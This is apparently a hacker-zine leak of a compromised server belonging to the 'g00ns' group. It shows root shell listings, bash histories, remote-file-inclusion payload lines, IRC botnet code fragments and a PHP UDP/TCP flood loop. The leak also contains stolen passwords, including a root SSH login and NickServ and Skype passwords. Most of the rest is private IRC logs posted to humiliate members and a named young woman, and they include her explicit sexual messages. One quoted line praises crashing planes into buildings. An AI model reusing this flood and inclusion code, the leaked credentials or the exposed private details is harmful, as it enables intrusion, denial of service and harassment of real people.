-drwxr-xr-x 6 g00ns83 g00ns83 4096 Oct 28 09:25 anymedia
--rw-r--r-- 1 g00ns83 g00ns83 81511 Apr 16 21:48 arcade.php
-drwxrwxr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 archive
--rw-rw-r-- 1 g00ns83 g00ns83 453 May 11 2005 arrow.jpg
--rw-rw-r-- 1 g00ns83 g00ns83 15360 Jun 19 2007 attachment.php
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 22 2007 ava
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 botnets
--rw-rw-r-- 1 g00ns83 g00ns83 74718 Jun 19 2007 calendar.php
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 cgi-bin
--rw-rw-r-- 1 g00ns83 g00ns83 43 Jun 19 2007 clear.gif
-drwxrwxr-x 5 g00ns83 g00ns83 4096 Oct 28 09:26 clientscript
-drwxrwxr-x 8 g00ns83 g00ns83 4096 Aug 2 2007 cpstyles
--rw-rw-r-- 1 g00ns83 g00ns83 3266 Jun 19 2007 cron.php
-drwxrwxr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customavatars
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customprofilepics
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 donations
-drwxrwxr-x 5 g00ns83 g00ns83 73728 Feb 17 16:23 downloads
--rwxrwxr-x 1 g00ns83 g00ns83 70283 Aug 11 2006 downloads.php
--rw-rw-r-- 1 g00ns83 g00ns83 44375 Jun 19 2007 editpost.php
--rw-rw-r-- 1 g00ns83 g00ns83 28539 Jun 19 2007 external.php
--rw-rw-r-- 1 g00ns83 g00ns83 9213 Jun 19 2007 faq.php
--rw-r--r-- 1 g00ns83 g00ns83 1150 Aug 2 2007 favicon.ico
--rw-r--r-- 1 g00ns83 g00ns83 1150 Sep 29 2006 favicon.ico.1
--rw-r--r-- 1 g00ns83 g00ns83 33531 Apr 1 2006 fbi.gif
--rw-rw-r-- 1 g00ns83 g00ns83 33023 Jun 19 2007 forumdisplay.php
--rw------- 1 g00ns83 g00ns83 16 Feb 16 2007 .ftpquota
-drwxr-xr-x 15 g00ns83 g00ns83 4096 Aug 2 2007 fusion
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 games
--rw-rw-r-- 1 g00ns83 g00ns83 28532 Jun 19 2007 global.php
--rw-r--r-- 1 g00ns83 g00ns83 4106 Apr 15 23:41 header.png
--rw-rw-r-- 1 g00ns83 g00ns83 314 Dec 8 12:49 .htaccess
--rw-rw-r-- 1 g00ns83 g00ns83 31 May 13 2005 .htaccessy
--rw-rw-r-- 1 g00ns83 g00ns83 908 May 11 2005 i.jpg
-drwxr-xr-x 2 g00ns83 root 4096 Dec 16 16:13 image
--rw-rw-r-- 1 g00ns83 g00ns83 7006 Jun 19 2007 image.php
-drwxr-xr-x 19 g00ns83 g00ns83 4096 Apr 16 20:18 images
-drwxrwxr-x 7 g00ns83 g00ns83 4096 Apr 11 17:00 includes
--rw-rw-r-- 1 g00ns83 g00ns83 17826 Dec 16 12:16 index.php
--rw-r--r-- 1 g00ns83 g00ns83 43378 Jun 19 2007 infraction.php
--rw-r--r-- 1 g00ns83 g00ns83 136603 Jun 19 2007 inlinemod.php
--rw-r--r-- 1 g00ns83 g00ns83 18 Jun 13 2007 in.php
--rw-rw-r-- 1 g00ns83 g00ns83 10290 Jun 19 2007 joinrequests.php
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Apr 15 22:46 katalyst
--rw-r--r-- 1 g00ns83 g00ns83 8222 Jun 19 2007 LICENSER
--rw-rw-r-- 1 g00ns83 g00ns83 9726 Feb 7 19:36 login.php
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 lolppp
--rw-rw-r-- 1 g00ns83 g00ns83 34113 Jun 19 2007 memberlist.php
--rw-rw-r-- 1 g00ns83 g00ns83 29733 Jun 19 2007 member.php
--rw-rw-r-- 1 g00ns83 g00ns83 23300 Jun 19 2007 misc.php
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 mod1cp
--rw-r--r-- 1 g00ns83 g00ns83 27560 Jun 19 2007 moderation.php
--rw-rw-r-- 1 g00ns83 g00ns83 6705 Jun 19 2007 moderator.php
--rw-rw-r-- 1 g00ns83 g00ns83 18056 Jun 19 2007 newattachment.php
--rw-rw-r-- 1 g00ns83 g00ns83 35434 Jun 19 2007 newreply.php
--rw-rw-r-- 1 g00ns83 g00ns83 16942 Jun 19 2007 newthread.php
-drwxr-xr-x 8 g00ns83 g00ns83 4096 Aug 2 2007 oldlayout
--rw-rw-r-- 1 g00ns83 g00ns83 19955 Jun 19 2007 online.php
--rw-r--r-- 1 g00ns83 g00ns83 7398 Jun 19 2007 payment_gateway.php
--rw-r--r-- 1 g00ns83 g00ns83 11724 Jun 19 2007 payments.php
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Oct 28 09:27 players
--rw-rw-r-- 1 g00ns83 g00ns83 26065 Jun 19 2007 poll.php
--rw-rw-r-- 1 g00ns83 g00ns83 72004 Jun 19 2007 postings.php
--rw-rw-r-- 1 g00ns83 g00ns83 6568 Jun 19 2007 printthread.php
--rw-rw-r-- 1 g00ns83 g00ns83 55163 Jun 19 2007 private.php
--rw-rw-r-- 1 g00ns83 g00ns83 94525 Jun 19 2007 profile.php
--rw-r--r-- 1 g00ns83 g00ns83 4188 Feb 14 2006 referrals.php
--rw-rw-r-- 1 g00ns83 g00ns83 468 May 11 2005 refresh.jpg
--rw-rw-r-- 1 g00ns83 g00ns83 38457 Jun 19 2007 register.php
--rw-rw-r-- 1 g00ns83 g00ns83 14498 Jun 19 2007 report.php
--rw-rw-r-- 1 g00ns83 g00ns83 13433 Jun 19 2007 reputation.php
--rwxrwxrwx 1 g00ns83 g00ns83 0 Sep 17 2007 scast_home.xml
-drwxr-xr-x 2 g00ns83 root 4096 Dec 6 2003 script
--rw-rw-r-- 1 g00ns83 g00ns83 115978 Jun 19 2007 search.php
-drwxrwxr-x 2 g00ns83 g00ns83 4096 Aug 8 2007 sec
--rw-r--r-- 1 g00ns83 g00ns83 61 Jun 10 2006 secnews.php
--rw-r--r-- 1 g00ns83 g00ns83 10524 Apr 6 2007 sendmail
--rw-rw-r-- 1 g00ns83 g00ns83 20225 Jun 19 2007 sendmessage.php
--rw-rw-r-- 1 g00ns83 g00ns83 10195 Jun 19 2007 showgroups.php
--rw-rw-r-- 1 g00ns83 g00ns83 10693 Jun 19 2007 showpost.php
--rw-rw-r-- 1 g00ns83 g00ns83 65310 Jun 19 2007 showthread.php
-drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 signaturepics
--rw-r--r-- 1 g00ns83 root 10026 Dec 16 12:33
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 spicvbtemp99
--rw-r--r-- 1 g00ns83 g00ns83 2853 Apr 17 00:01 subheader.php
--rw-r--r-- 1 g00ns83 g00ns83 10069 Apr 17 00:19 subscribersfeat.php
--rw-rw-r-- 1 g00ns83 g00ns83 30709 Jun 19 2007 subscription.php
-drwxrwxr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 subscriptions
--rw-rw-r-- 1 g00ns83 g00ns83 7904 Sep 7 2005 subscriptions.php
--rw-r--r-- 1 g00ns83 g00ns83 61 Jun 10 2006 technews.php
--rw-rw-r-- 1 g00ns83 g00ns83 8614 Jun 19 2007 threadrate.php
-drwxr-xr-x 2 root root 4096 Mar 9 11:19 tribal
-drwxr-xr-x 4 g00ns83 g00ns83 4096 Aug 2 2007 tutorials
-drwxr-xr-x 2 g00ns83 g00ns83 4096 Jan 10 13:41 uploads
--rw-rw-r-- 1 g00ns83 g00ns83 21967 Jun 19 2007 usercp.php
--rw-rw-r-- 1 g00ns83 g00ns83 18798 Jun 19 2007 usernote.php
--rw-r--r-- 1 g00ns83 g00ns83 14047 Jun 3 2006 vboutput1.php
--rw-r--r-- 1 g00ns83 g00ns83 2 Apr 17 00:18 viewed.txt
-drwxr-xr-x 4 g00ns83 g00ns83 4096 Mar 27 16:15 z3r0
-[root@demon2 g00ns83]# cd ../g00nsts395
-[root@demon2 g00nsts395]# ls -al
-total 1216
-drwx--x--x 10 g00nsts395 g00nsts395 4096 Apr 16 19:57 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
-drwx------ 2 g00nsts395 g00nsts395 4096 Aug 1 2007 backups
--rw------- 1 g00nsts395 g00nsts395 15363 Apr 16 20:43 .bash_history
--rw-r--r-- 1 g00nsts395 g00nsts395 304 Jun 3 2006 .bash_logout
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-[root@demon2 g00nsts395]# head .bash_history
-tar -xjf ts2_server_rc2_20201.tar.bz2
-rm ts2_server_rc2_20201.tar.bz2
-cd tss2_rc2/
-./teamspeak2-server_startscript start
-[root@demon2 g00nsts395]# tail .bash_history
-cd ts
-./teamspeak2-server_startscript stop
-rm server.log
-./teamspeak2-server_startscript start
-cd $home
-cd tss2_rc2/
-nano server.log
-[root@demon2 g00nsts395]# cd ../pr0be/
-[root@demon2 pr0be]# ls -al
-total 44
-drwx--x--x 5 564 565 4096 Mar 9 11:56 .
-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
--rw------- 1 564 565 218 Jan 5 00:12 .bash_history
--rw-r--r-- 1 564 565 24 Jan 4 23:06 .bash_logout
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-lrwxrwxrwx 1 564 565 31 Jan 4 23:20 public_html -> ./domains/
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-[root@demon2 pr0be]# cat .bash_history
-tar jxfv irssi-0.8.12.tar.gz
-tar -xzyf irssi-0.8.12.tar.gz
-tar xvfz irssi-0.8.12.tar.gz
-cd irssi-0.8.12
-sudo glib
-yum glib
-uname -a
-[root@demon2 pr0be]# ls -al public_html/
-total 56
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-drwx--x--x 8 564 565 4096 Jan 5 00:10 ..
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-[root@demon2 pr0be]# cd ../sixtyz
-[root@demon2 sixtyz]# ls -al
-total 56
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--rw------- 1 sixtyz sixtyz 757 Apr 16 19:09 .bash_history
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-lrwxrwxrwx 1 sixtyz sixtyz 29 Mar 22 20:27 public_html -> ./domains/
--rw-r----- 1 sixtyz mail 34 Apr 16 17:33 .shadow
-drwxr-xr-x 2 root root 4096 Apr 16 17:29 wee
-[root@demon2 sixtyz]# cat .bash_history
-weechat -h
-ls /usr/bin
-nano /usr/bin/ddos
-ls po
-ls intl
-nano weechat_icon_32.png
-ls debian
-ls /home/sixtyzzz
-ls /home/sixtyz
-ls po
-ls doc
-nano doc/weechat-curses.1
-cd $home/.weechat
-cd $user
-mkdir irc
-cd irc
-tar -xzf weechat-0.2.6.tar.gz
-cd weechat-0.2.6
-nano config.h
-ls po
-ls intl
-nano README
-cd /usr
-ls bin
-ls bin ; grep wee
-cd /home/sixtyz
-ls /kerberos
-ls wee
-ls irc
-cd irc
-cd weechat-0.2.6
-ls src
-ls src/irc
-ls src/gui
-[root@demon2 sixtyz]# ls -al public_html/
-total 688
-drwxr-xr-x 5 sixtyz sixtyz 4096 Apr 14 20:48 .
-drwx--x--x 8 sixtyz sixtyz 4096 Mar 23 00:10 ..
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-[root@demon2 sixtyz]# head public_html/rfis_good.txt
- format_menue=
- format_menue=
- eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),
- exit.%2527&a=
- phpbb_root_path=
-[root@demon2 sixtyz]# head public_html/l.txt
-echo "Inserted <b>successfully</b><br>\n";
-$country = file_get_contents('');
-class irc_bot {
- var $config = array("server" => "",
- "port" => "6667",
- "chan" => "#fbilol",
- "key" => "lol",
-[root@demon2 sixtyz]# head public_html/r.txt
-echo "Inserted <b>successfully</b><br>\n";
-class gBot
- var $config = array("server"=>"",
- "port"=>6667,
- "pass"=>"",
- "prefix"=>"[XX]|",
-[root@demon2 sixtyz]# head public_html/1.txt
- for($i=0;$i<($_GET['length']*100);++$i)$sock=@fsockopen((
-$_GET['prot'] == "udp" ? "udp://" : "").$_GET['ip'], $_GET['port'], $errno, $errstr, 0.0001);
-?>[root@demon2 sixtyz]#
-[root@demon2 sixtyz]# cd ../sn00g3s
-[root@demon2 sn00g3s]# ls -al
-total 72
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-drwx--x--x 50 root root 4096 Mar 27 16:19 ..
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--rw-r--r-- 1 sn00g3s sn00g3s 304 Jun 8 2006 .bash_logout
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-total 12
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-drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 ..
--rw-r--r-- 1 sn00g3s sn00g3s 224 May 22 2007 known_hosts
-[root@demon2 sn00g3s]# cat .ssh/*
- ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvMKDvuIjkr3pTrFe7S4M83WnL
-[root@demon2 sn00g3s]# cd public_html/
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-total 208672
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-[root@demon2 public_html]# cat /home/sn00g3s/domains/
-( crap may be removed )
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-|| # All PHP code in this file is ©²000-2007 Jelsoft Enterprises Ltd. # ||
-|| # This file may not be redistributed in whole or significant part. # ||
-|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
-|| # | # ||
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-|| # vBulletin 3.6.4 - Licence Number VBFD1673E2
-|| # ---------------------------------------------------------------- # ||
-|| # All PHP code in this file is ©²000-2007 Jelsoft Enterprises Ltd. # ||
-|| # This file may not be redistributed in whole or significant part. # ||
-|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
-|| # | # ||
-|| #################################################################### ||
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-[root@demon2 public_html]# cd /var/spool/mail
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-total 75300
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--rw-rw---- 1 mail mail 1038 Aug 30 2007 mail
--rw-rw---- 1 party party 182080 Feb 13 07:40 party
--rw-rw---- 1 pingyill pingyill 60510303 Apr 21 14:55 pingyill
--rw-rw---- 1 rageserver rageserver 0 Apr 28 2006 rageserver
--rw-rw---- 1 robo robo 554 Jun 1 2007 robo
--rw------- 1 root root 1765 Feb 10 14:01 root
--rw-rw---- 1 sixtyz mail 4701 Apr 14 08:08 sixtyz
--rw-rw---- 1 sn00g3s sn00g3s 0 Jun 8 2006 sn00g3s
--rw-rw---- 1 void void 0 Jan 18 2007 void
-In any large hacking community there are two kinds of people at the top.
-The first is not going anywhere. They are either unskilled (even for that
-level) and lucky to be there (probably there through patronage), or they are
-just happy with the benefits from being at the top of that level.
-The second group is smaller, and contains a couple of people who have the
-talent, willingness to learn, dedication and time to move forward. There are
-a couple of those at g00ns, and we wish them good luck. Don't settle for being
- at the top of an organization that sells positions on a forum, whose
-competitors are The Defaced and The Regime. But you can't just look for the
- next cool hacker website, you dig? Try to find smarter people, and they
-will not always advertise.
-It's not over yet kids! Time for profiles!
-// z3r0 //
-z3r0 -> nickserv: identify r3xleoP3@Dm3s!!!#&6^
-g00ns #private password and skype password: ismokedyoustupid
-z3r0 on zf03: What exactly is Zf0 3? it looks like a article about how Zf0
- just goes around owning people.
-z3r0 on zf03: HAH the irc logs are a comedy goldmine.
--19:48:59- (z3r0) we will have to introduce you to illwill
--19:49:03- (z3r0) hes our asm guru
--20:02:29- (z3r0) most kiddies cant even run a perl script
--20:08:55- (z3r0) basically our credo is we hate neophytes
--20:16:22- ~ (Psyop) Do you read many zines?
--20:16:27- (z3r0) sometimes
--20:16:28- (z3r0) depends
--20:16:39- (z3r0) i read zf0's
-Always good to have fans.
-// clorox //
-clorox -> nickserv: identify loldongs
-"I'm planning on doing some irl raids myself here shortly. I think the target
-deserves to be targeted and deserves whatever actions come out of it. I don't
- understand the current direction the raid is taking look if you are going to
- spread documents and call it a raid i think thats rather ridiculous there are
- thousands of other sites that do that already. Words are for Discourse Violence
- is for Change, look its tough to even type this but paper airplanes don't
-change anything...they don't they just don't. If you make a paper airplane and
- hand it off to people and try to show them information nothing will change.
-What changes things are when airplanes crash into shit and do damage, that is
-really all today's world is about; the level of importance is directly related
- to the amount of damage something has done. Don't hand people paper...slam a
- fucking plane into a building and force the shit on them."
-What's the moral there, that terrorism is an acceptable and admirable way of
-accomplishing your goals? CLOROX IS A TERRORIST WANNABE!!!! Hand the man a turban!
-cloroxsecure (2:38:16 AM): if i see someone fucking around with the community
- we are going to expose them
-cloroxsecure (2:38:25 AM): you were exposed
-clorox -> Depravus: explain to me why g00ns are lame?
-Depravus -> clorox: Personal army shit, internet tough guy shit, etc.
-clorox -> Depravus: like?
-Depravus -> clorox: Like typical 13 year olds that figured out how to use the in
-clorox -> Depravus: first off none of us are 13 years old.... 18+ and most of u
-s are older than that... secondly we are not anon we do what we want
-Depravus -> clorox: Dude you don't have to be 13 to act like a 13 year old
-Depravus -> clorox: You could be 49 for all I care
-Depravus -> clorox: And that mentality is why you're lame
-Depravus -> clorox: "We do what we want"
-clorox -> Depravus: why do you think we act like 13 year olds
-Depravus -> clorox: Which gives rise to internet tough guy mentality
-clorox -> Depravus: do you not do what you want?
-clorox -> Depravus: sorry we've pulled anon out of situations they couldn't handle
-clorox -> inky_: $servidor='' unless $servidor;
-clorox -> inky_: my $porta='6667';
-clorox -> inky_: my @canais=("#!!g00ns");
-clorox -> inky_: my @adms=("br3ttch4nce");
-inky_ -> clorox: are any of the 2.6.9 kernels vuln? they seem to be most popular
-clorox -> inky_: milw0rm vmsplice
-// ZF0 much help, great success!
-Genocide -> clorox: i miss #irclogs
-Genocide -> clorox: :[
-clorox -> Genocide: ditto
-Ok the real funny thing about clorox is his relationship with theswellseason (IRC whore).
-The entire time they were dating she was flirting with other guys on IRC. The only guy
-she didn't flirt with was clorox, who was too busy taking g00ns very fucking seriously!
-She sure likes the attention she gets when she shows titties.
-tribaL -> sCuZz: homeboys gonna get played like the rest
-tribaL -> sCuZz: but you know hes not going to listen
-tribaL -> sCuZz: not to me
-tribaL -> sCuZz: not to you
-tribaL -> sCuZz: not to z3r0
-We present to you, the chronological IRC life of theswellseason!
-theswellseason -> d0ct0r: my dad, when he found out I'd lost my virginity, started
-crying. and I just sat there totally stonefaced because i knew if I said anything,
-I'd burst into laughter
-d0ct0r -> theswellseason: wtf
-theswellseason -> d0ct0r: lol
-theswellseason -> d0ct0r: yeah
-theswellseason -> d0ct0r: I know
-theswellseason -> d0ct0r: my dad is such a pussy sometimes
-d0ct0r -> theswellseason: my mom was like
-d0ct0r -> theswellseason: 3 years ago
-d0ct0r -> theswellseason: 'when you going to pop your cherrry'
-d0ct0r -> theswellseason: i was like
-d0ct0r -> theswellseason: huh
-d0ct0r -> theswellseason: i remember this
-theswellseason -> d0ct0r: my parents are really religious though
-d0ct0r -> theswellseason: cause i was like, how could i cheer.y
-d0ct0r -> theswellseason: cherry*
-theswellseason -> d0ct0r: lol
-d0ct0r -> theswellseason: one of my problems is
-theswellseason -> d0ct0r: my parents view the whole "sex before marriage" thing as being really bad
-d0ct0r -> theswellseason: i like to go for the 0 size jean girls
-sCuZz -> theswellseason: im envious of clorox
-sCuZz -> theswellseason: and im wanking
-theswellseason -> sCuZz: It's sideways, but, observe:
-theswellseason -> sCuZz:
-theswellseason -> sCuZz: blurry, but somewhat full body
-sCuZz -> theswellseason: you have an amazing ass
-theswellseason -> sCuZz: I can't believe I'm showing you this
-theswellseason -> sCuZz: I'm only adding to the fuel
-sCuZz -> theswellseason: i do have to admit its kinda hot
-theswellseason -> sCuZz: jesus, clorox is going to have my head for being such a flirt
-theswellseason -> sCuZz: why does the g00ns irc server not allow ssl connections?
-sCuZz -> theswellseason: stop being sketchy
-theswellseason -> sCuZz: dude, clorox just got a webcam
-sCuZz -> theswellseason: have you seen his cock?
-theswellseason -> sCuZz: no
-sCuZz -> theswellseason: and hes seen you nude
-sCuZz -> theswellseason: ?
-theswellseason -> sCuZz: yeaaaaah
-theswellseason -> sCuZz: trust me
-theswellseason -> sCuZz: I don't find that fair either
-sCuZz -> theswellseason: lol
-sCuZz -> theswellseason: what if his cock is like
-sCuZz -> theswellseason: 4 inches?
-sCuZz -> theswellseason: or hes pushing 5
-theswellseason -> sCuZz: er, I'm really fucking tight anyways, so that won't be a big deal
-sCuZz -> theswellseason: thats not fair
-theswellseason -> sCuZz: what?
-sCuZz -> theswellseason: you telling me your tight
-theswellseason -> sCuZz: seriously, I don't have big fingers and it's pushing it to get two of my fingers in there.
-theswellseason -> sCuZz: lol
-theswellseason -> sCuZz: shit
-theswellseason -> sCuZz: now I'm just being mean
-sCuZz -> theswellseason: wow
-sCuZz -> theswellseason: i dont believe that
-sCuZz -> theswellseason: :(
-theswellseason -> sCuZz: okay
-theswellseason -> sCuZz: well, two fit fine
-sCuZz -> theswellseason: haha
-theswellseason -> sCuZz: but like, I can't put three side-by-side
-sCuZz -> theswellseason: thats fucked up
-sCuZz -> theswellseason: see
-sCuZz -> theswellseason: you do like to tease
-sCuZz -> theswellseason: does it hurt to masturbate
-theswellseason -> sCuZz: well... no
-theswellseason -> sCuZz: you just have to be careful?
-theswellseason -> sCuZz: lol, I don't even bother with panties
-theswellseason -> sCuZz: I'm just straight nude
-sCuZz -> theswellseason: hot
-theswellseason -> sCuZz: lol
-theswellseason -> sCuZz: clorox is going to kill me for telling you all this lol
-theswellseason -> sCuZz: I'll give you noodz if you'll give me cock pics
-theswellseason -> sCuZz: so that I can make clorox jealous
-sCuZz -> theswellseason: i so know this is a setup
-theswellseason -> sCuZz: how so?
-sCuZz -> theswellseason: but if it means clorox gets to see my cock
-sCuZz -> theswellseason: ill be happy
-theswellseason -> vgx:
-theswellseason -> vgx: I'm dating a g00n
-theswellseason -> vgx: I take everything with a grain of salt
-botkip -> theswellseason: I wouldn't fuck with botkip if I were you...
-people are reading the logs right now // if only you knew
-theswellseason -> Ninth_: he was being an ass
-theswellseason -> Ninth_: and there was someone else that wanted me to
-"run away with him"
-theswellseason -> Ninth_: and this other person... idk... was charming
-Ninth_ -> theswellseason: work hard, stick with him, honestly, that will mean
-so much more than anything else, knowing that you are devoted enough to stay together.
-theswellseason -> Ninth_: and I almost wanted to cheat, but like... idk
-theswellseason -> sCuZz: I was a whore before I met clorox
-theswellseason -> TokyoFox: old pic is old, but:
-theswellseason -> sCuZz:
-theswellseason -> sCuZz:
-^ emo hair lol.....
-Zombocom -> theswellseason: I love you Emmaleigh
-theswellseason -> Zombocom: I'm going to the coffee shop later, I'll talk to you then
-theswellseason -> Zombocom: I love you too James
-Anonzz -> theswellseason: This is a pic of me and my bitch
-Anonzz -> theswellseason:
-theswellseason -> Zombocom: Because you are
-theswellseason -> Zombocom: you're... just amazing
-theswellseason -> Zombocom: what do you mean you misssed me?
-theswellseason -> Zombocom: I was gone for all of... five minute?
-theswellseason -> ServicesUp: you're in #programming
-theswellseason -> ServicesUp: you're a programer?
-ServicesUp -> theswellseason: yes
-// That might impress theswellseason, but...
-ServicesUp -> #programming: is IP based on MAC address?
-theswellseason -> Deltantor: you're silly
-theswellseason -> Deltantor: they're just tits
-Deltantor -> theswellseason: I just like yours a lot >_> they are...perfect
-Deltantor -> theswellseason: <theswellseason>
-Deltantor -> theswellseason: <theswellseason> don't go posting that places
-theswellseason -> p00h: p00h, clorox could root ANYONE
-p00h -> theswellseason: clorox doesnt know about rooting
-// keeps calling her babygirl
-// gave her a user account
-theswellseason -> p00h: I think clorox could handle me going on a trip
-theswellseason -> p00h: lol
-p00h -> theswellseason: lol
-theswellseason -> p00h: we're just friends, right?
-p00h -> theswellseason: why, what would u say if i ran porn sites
-p00h -> theswellseason: u still have the nipple peircings?
-theswellseason -> p00h: yep
-p00h -> theswellseason: nice
-p00h -> theswellseason: they look nice
-theswellseason -> p00h: yeop
-p00h -> theswellseason: i like the studs
-theswellseason -> p00h: lol I like them
-p00h -> theswellseason: im sure u have heard this
-p00h -> theswellseason: but ur nipples like really hot
-p00h -> theswellseason: they are perfect looking
-theswellseason -> p00h: I have heard that
-// I just can't resist dropping any pm where someone begs someone to be private
-theswellseason -> p00h: when the other guy says he loves me, I believe it
-theswellseason -> p00h: I'm just scared that if I leave clorox he'll turn g00ns
-on me and get them to ruin my life
-theswellseason -> p00h: z3r0 has threatened to do so if I hurt clorox
-theswellseason -> p00h: that's why you cannot EVER tell him this
-theswellseason -> p00h: I'm gonna try and back out peacefully
-p00h -> theswellseason: it would be
-theswellseason -> p00h: but if he knows it's for another guy, I'm done
-p00h -> theswellseason: that would be the safest thing
-p00h -> theswellseason: ya
-theswellseason -> p00h: so please please please p00h
-p00h -> theswellseason: i won't say anything
-theswellseason -> p00h: don't tell anyone
-p00h -> theswellseason: don't worry
-sCuZz -> tribaL: whats the deal with theswellseason?
-tribaL -> sCuZz: idk
-tribaL -> sCuZz: why
-tribaL -> sCuZz: shes dating clorox IRL THO
-sCuZz -> tribaL: i know
-sCuZz -> tribaL: she tells me shit all the time
-sCuZz -> tribaL: and it just seems like shes being an e whore
-theswellseason -> p00h: I've fucked a chick before
-p00h -> theswellseason: but not with a penis
-theswellseason -> p00h: well
-theswellseason -> p00h: does a strapon count?
-p00h -> theswellseason: no
-theswellseason -> p00h: shit
-theswellseason -> p00h: that's his IP
-p00h -> theswellseason: how do u know
-theswellseason -> p00h: because he just visted a page that I had set up specifically to get his IP
-theswellseason -> p00h: the only other IP to have visited that page is mine
-theswellseason -> p00h: and that's not my IP
-p00h -> theswellseason: hehe
-theswellseason -> p00h: so it must be his
-p00h -> theswellseason: you are such a haxor
-theswellseason -> p00h: lol
-theswellseason -> p00h: aren't I though?
-theswellseason -> p00h: see, I may need to learn, but hell
-p00h -> theswellseason: u are a hax0r
-p00h -> theswellseason: im proud of u
-theswellseason -> p00h: I have a few really useful tricks up my sleeve already
-theswellseason -> p00h: whatdya gonna do, p00h?
-theswellseason -> p00h: I think you'd get in the room and like, cum prematurely
- from the nervousness of being around a woman like me
-And this basically sums it up nicely...
-sCuZz -> tribaL: lol she told me that when they broke up
-sCuZz -> tribaL: he was like saying he wanted to spend the rest of his life with her
-// pr0be //
-tribaL -> nickserv: identify h4x0r!
-pr0be -> nickserv: identify h4x0r!
-For anyone who didn't know, tribaL == pr0be. He was too embarassed to carry on
- under his nick, so he concocted a stupid story and has been living it.
-tribaL -> sCuZz: they think im from anonymous
-tribaL -> sCuZz: i can't let them know im pr0be ;(
-tribaL -> luna: switching from pr0be to tribal because of my dox
-One common thread in pr0be's IRC messages is his (emotional) insecurity and jealousy.
-Always bitching about someone, like clorox.
-For the past few months, Alot of you have met the new guy tribaL. TribaL and i go
-back quite a bit, and he is the most trustworthy individual on the net that i have
-met thus far.
-The truth is, I have been training a replacement. I have been here for quite some
-time, and real life is starting to take over. With that said, it is about the time
-that i step down.
-I will not join any other crew. g00ns is and will always be my home, and if real life
- slows down perhaps i will be back. Most of you can contact me, but you know i just
- have not been online as much as i used to be anymore.
-Respect tribaL, he is one crazy motherfucker.
-Later guys
-oh, and i aint gay.
- motd
-God i'm going to miss this place so fucking much.
-Just remember, Things aren't like they used to be. For the most part,
-you are on your own. Watch your own ass, and do what you have to, to
-protect it. Even if g00ns were to end tomarrow, Nobody will ever be able
-to break our spirit. Nobody will ever be able to tell us we didn't own
-the internet. Watch out bro, And its never too late to get out while
-your ahead. People will listen to you - You have a good head on your
-shoulders. Maybe down the road we will start over, With all of the
-knowledge of our mistakes the first time. This isn't the end. Whoever
-attacks may win the battle, But they will never win the war. If g00ns
-shuts down, Its not the end. We still have our cliche- our group of guys
-that we will hang out with. We are smarter when it comes to getting shit
-done and not getting caught. We will prevail. You know if you need
-anything, i'll help you to my fullest extent. You're my homie.
-Walk light, And keep your head on a swivel. Most of the people out here
-are snakes.
-- [g00n] motherfucking pr0be
-pr0be temporary h4cky0u forum pass (probably changed by now) 164187e6
-// z3r0 sticks it to pr0be
-I was^H^H^Ham sorry to inform you that because of your
-^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hthat since you have been messing
- with our staff I will have to let you go. I'm soor^H^Hrry but you have to
- go. We do not want to^H^Hyou in the com^Hmmunity anymore.
-pr0be bearshare: polxx/104diam
-loSt -> tribaL: riot wants me to give him ops in g00ns chan again
-loSt -> tribaL: should i?
-tribaL -> loSt: no
-tribaL -> loSt: just ignore it
-loSt -> Riot: ill talk to tribal and see if im allowed to ops you
-Riot -> tribaL: can i get my goddamn ops. or at least voice.
-Riot -> tribaL: Dude, am I ever getting my ops back and shit
-tribaL -> Riot: stop
-tribaL -> Riot: socialing me
-tribaL -> Riot: dude
-tribaL -> Riot: why
-tribaL -> Riot: are y
-tribaL -> Riot: ou
-tribaL -> Riot: trying
-tribaL -> Riot: to social me
-Riot -> tribaL: ...
-Riot -> tribaL: No
-Riot -> tribaL: like I'm pissed as fuck
-tribaL -> Riot: socialed
-Riot -> tribaL: For real are you all just going to keep being cocksuckers
-Riot -> tribaL: or what
-Riot -> tribaL: because z3r0 goes and tells jon
-Riot -> tribaL: that I told g00ns he's been giving people up <--- this is true, z3r0 is an informant. No joke.
-tribaL -> Riot: idonno
-Riot -> tribaL: Like its some fucking bullshit
-tribaL -> Riot: im just smoking
-Riot -> tribaL: and i'm steps away from fucking walking bro.
-tribaL -> Riot: and trying to hack f bis
-Riot -> tribaL: I put my trust fucking time and again into g00ns
-Riot -> tribaL: and you fuckers just throw it back in my fucking face dude.
-tribaL -> Riot: i can imagine
-tribaL -> inky_:
-tribaL -> inky_: SSH port 3785
-tribaL -> inky_: User: root
-tribaL -> inky_: Pass: zr0mg123
-tribaL -> inky_: dont tell anybody i gave it to you
-# Talking to yourself is not safe, ZF0 can hear you.
-tribal -> tribal: clorox sucks cock
-tribal -> tribal: a59 sucks cock
-# he keeps bumming money off people, it's pathetic
-tribaL -> loSt: got 10 bucks i canborrow
-loSt -> tribaL: nah man
-tribaL -> loSt: feck
-FuRY -> tribaL: cause z3r0 and clorox are running with there reputations....
-FuRY -> tribaL: they havent done anything in years
-FuRY -> tribaL: lol
-tribaL -> FuRY: i have to teach clorox shit
-FuRY -> tribaL: :\
-tribaL -> FuRY: z3r0
-tribaL -> FuRY: im not going to sell him out
-FuRY -> tribaL: is dead
